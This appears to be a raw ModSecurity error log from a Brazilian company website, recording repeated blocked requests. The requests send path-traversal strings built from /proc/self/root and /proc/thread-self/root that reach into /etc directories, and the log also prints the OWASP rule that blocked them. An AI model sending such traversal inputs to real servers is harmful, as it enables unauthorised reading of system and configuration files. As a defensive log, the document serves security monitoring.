https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:43:33.447400 2026] [:error] [pid 14269:tid 140411725141760] [client 74.7.243.128:45004] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubFQbLMZ6AikZjR9UijgAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:43:37.971380 2026] [:error] [pid 17653:tid 140411641214720] [client 74.7.241.31:36960] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubGcdf6f5d65gmYZQ4SAAAAsw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:43:41.171896 2026] [:error] [pid 27403:tid 140411666392832] [client 74.7.243.128:45018] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubHRkFeYa1D6dYQnCx7wAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:43:45.276586 2026] [:error] [pid 27403:tid 140411649607424] [client 74.7.241.31:54098] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubIRkFeYa1D6dYQnCx8wAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:43:46.531649 2026] [:error] [pid 19093:tid 140411540502272] [client 74.7.243.128:44740] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubIl_V7PWP6ixUYl6BRgAAApg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:44:12.145326 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.228.61:39174] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abubPAkwaGbbGflqUZB5BwAAANY"]
[Thu Mar 19 03:44:26.251737 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.241.31:54112] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubSuyqAr6etmhZHNopuQAAAEM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:44:27.579338 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.241.31:41740] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubS8df6f5d65gmYZQ4agAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:44:28.841292 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.241.31:41742] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubTMdf6f5d65gmYZQ4awAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:44:30.183404 2026] [:error] [pid 19093:tid 140411733534464] [client 74.7.241.31:41746] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubTl_V7PWP6ixUYl6BXgAAAoE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:44:31.525562 2026] [:error] [pid 27403:tid 140411733534464] [client 74.7.241.31:41754] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubTxkFeYa1D6dYQnCyEAAAAcE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:44:32.843026 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.241.31:41758] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubUOyqAr6etmhZHNopugAAAFE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:44:44.027509 2026] [:error] [pid 27293:tid 140411641214720] [client 74.7.241.31:41762] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubXP-YZRR_7pZ7nDJSyQAAA8w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:44:45.350111 2026] [:error] [pid 27403:tid 140411691570944] [client 74.7.241.31:55930] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubXRkFeYa1D6dYQnCyEgAAAcY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:44:46.660853 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:55936] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubXta6ubjKNq_cu4YD_gAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:44:48.000928 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.241.31:52780] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubX9a6ubjKNq_cu4YD_wAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:44:49.279682 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.241.31:52788] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubYQkwaGbbGflqUZB5TwAAANM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:44:51.542757 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.241.31:52798] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubYuoXxyEfFpUF8f_WygAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:44:53.911331 2026] [:error] [pid 27403:tid 140411716749056] [client 74.7.241.31:52808] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubZBkFeYa1D6dYQnCyFgAAAcM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:44:55.362072 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.241.31:52820] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubZ-oXxyEfFpUF8f_W0QAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:44:56.667969 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.241.31:52834] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubaNa6ubjKNq_cu4YEAAAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:44:57.122211 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.243.128:41982] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubaQkwaGbbGflqUZB5XQAAANU"], referer: 